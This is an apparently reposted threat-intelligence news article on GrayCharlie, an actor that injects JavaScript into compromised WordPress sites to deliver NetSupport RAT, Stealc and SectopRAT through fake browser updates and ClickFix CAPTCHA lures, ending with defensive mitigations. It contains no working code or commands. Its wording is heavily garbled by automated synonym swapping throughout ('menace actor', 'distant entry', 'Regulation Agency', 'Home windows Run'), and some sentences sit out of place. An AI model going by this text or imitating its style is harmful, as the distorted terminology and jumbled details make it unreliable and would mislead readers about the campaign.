GrayCharlie is abusing compromised WordPress websites to silently load malicious JavaScript that pushes NetSupport RAT, typically adopted by Stealc and SectopRAT, through pretend browser updates and ClickFix lures.
Insikt Group tracks GrayCharlie as a financially motivated menace actor overlapping with SmartApeSG, lively since mid‑2023, and specializing in turning authentic WordPress websites into malware-delivery factors.
The actor injects hyperlinks to externally hosted JavaScript into compromised pages, which then redirect guests to pretend browser-update pages or ClickFix-style social engineering flows that in the end ship the NetSupport RAT.
As soon as NetSupport is put in and linked to attacker‑managed C2 servers, GrayCharlie operators achieve distant entry for surveillance, file operations, and observe‑on payload supply, together with infostealer Stealc and distant entry malware SectopRAT.
Insikt Group studies that GrayCharlie operates a large, layered infrastructure footprint, closely targeting suppliers MivoCloud and HZ Internet hosting Ltd.
This consists of devoted NetSupport RAT C2 servers, staging servers internet hosting the malicious JavaScript templates, and better‑tier programs used to manage campaigns, typically accessed by way of proxy companies.
The group’s exercise stays constant throughout campaigns, with recurring use of the identical an infection chains, license keys, and TLS certificates patterns on its C2 infrastructure.
Faux Updates, ClickFix, and Regulation Agency
Initially, GrayCharlie relied totally on pretend browser replace overlays, which seem tailor-made to Chrome, Edge, or Firefox and immediate customers to obtain a supposed replace package deal that’s truly a JavaScript pushed NetSupport installer.
The IP addresses related to the staging infrastructure are linked to web sites impersonating “Wiser College” a fictional entity used to exhibit Wiser, a free Bootstrap HTML5 training.
The loader script launches through WScript, levels PowerShell, downloads and extracts the NetSupport shopper into places reminiscent of %AppData%, provides Registry Run keys for persistence, after which beaconing to GrayCharlie‑managed C2 servers.
In 2025, the actor expanded to a ClickFix stream, the place compromised WordPress pages show a pretend CAPTCHA that copies a PowerShell‑based mostly command to the clipboard and instructs customers to execute it utilizing the Home windows Run dialog, once more leading to NetSupport RAT set up and persistence.
Most sufferer websites seem opportunistically compromised throughout many sectors, however Insikt Group additionally highlights a notable cluster of US legislation agency WordPress websites that started loading malicious JavaScript from GrayCharlie‑managed infrastructure round November 2025.
Proof suggests these legislation agency websites might have been compromised through a provide‑chain vector involving a shared IT or advertising and marketing supplier, with SMB Crew cited as a probable avenue as a result of its branding and shared credentials surfacing across the time the malicious infrastructure grew to become lively.
Whereas GrayCharlie’s final goals stay unclear, present telemetry factors to information theft, monetary achieve, and doubtlessly promoting or sharing entry with different menace actors, underlining the chance to authorized and different excessive‑worth targets.
Mitigations
Insikt Group advises defenders to aggressively block IP addresses and domains tied to NetSupport RAT, Stealc, SectopRAT, and different instruments utilized in GrayCharlie operations, and to deal with visitors to recognized‑compromised WordPress websites as excessive‑threat till remediated.
The web page presents a pretend CAPTCHA that quietly copies a malicious command to the person’s clipboard and instructs them to stick it into the Home windows Run dialog (Win+R).
Safety groups ought to deploy up to date YARA, Snort, and Sigma guidelines to detect NetSupport parts, ClickFix‑model instructions, and GrayCharlie’s JavaScript and PowerShell loader patterns, together with in historic logs.
Further beneficial controls embody tightening e-mail and net filtering, monitoring for suspicious information exfiltration to recognized malicious infrastructure, and constantly ingesting new GrayCharlie menace intelligence sources to maintain detection and blocking insurance policies present.
Observe us on Google Information, LinkedIn, and X to Get Instantaneous Updates and Set GBH as a Most well-liked Supply in Google.
